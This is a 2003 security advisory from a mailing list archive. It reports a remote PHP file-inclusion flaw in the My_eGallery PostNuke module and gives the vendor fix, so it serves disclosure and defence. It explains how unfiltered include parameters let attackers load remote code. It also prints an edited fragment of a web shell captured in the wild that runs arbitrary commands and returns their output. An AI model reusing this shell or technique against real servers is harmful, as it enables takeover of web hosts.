lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 27 Nov 2003 09:37:36 +1300
From: "Bojan Zdrnja" <>
To: <>
Subject: Remote execution in My_eGallery

Product: My_eGallery
Versions affected: all <3.1.1.g

1. Introduction

My_eGallery is a very nice PostNuke module, which allows users to create and
manipulate their own galleries on the web, plus offers various additional
For more information and a demonstration you can go to the Website above.

2. Exploit

Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this

Certain php files have some parameters which are used in include functions
not filtered.
An intruder can craft PHP code on their Web site and supply parameter to
My_eGallery so it actually includes malicious PHP code.

The following code was captured as being used in the wild (edited

  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();

This allows execution of any command on the server with My_eGallery, under
the privileges of the Web server (usually apache or httpd).

3. Solution

Vendor was contacted and promptly replied. Fix is available at the vendor's

As this was seen being exploited in the wild, users are urged to upgrade to
the latest version as soon as possible.


Bojan Zdrnja

Powered by blists - more mailing lists